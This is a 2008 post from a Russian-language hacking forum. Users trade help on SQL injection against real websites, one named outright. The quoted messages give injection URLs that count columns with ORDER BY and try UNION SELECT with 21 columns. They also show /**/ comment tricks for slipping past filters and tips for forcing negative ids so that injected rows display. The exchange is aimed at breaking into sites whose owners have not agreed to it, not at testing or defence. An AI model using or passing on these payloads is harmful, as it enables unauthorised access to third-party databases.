25.09.2008, 15:36
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от DJ ][akep
Помогите SQL-inj
Вот кол-во столбцов вроде подобрал
PHP код:
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+order+by+21/*
но так нехочет:
PHP код:
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
Скорее всего одна переменная идёт в два разных запроса с разной структурой, т.е. разное количество столбцов
Сообщение от SIdoy
Сообщение от IND1G0
http://сайт/id=0+union+select+1/*
Выводит
(страница 0 union select 1/* из 1)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16
Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
Как можно заюзать эту ошибку?
Попробуй вместо пробелов /**/
id=0/**/union/**/select/**/1/*
Бред. Значение из переменной подставляется в limit, а т.к. в лимит нельзя вставлять выражения, то ты в пролёте.
Сообщение от luz3r
Без разницы какую кавычку ставить ... Важно изменить так чтобы страница имела отрицательное значение.
Надо чтобы значение не существовало
__________________
Последний раз редактировалось +toxa+; 25.09.2008 в 16:24..
|
|
|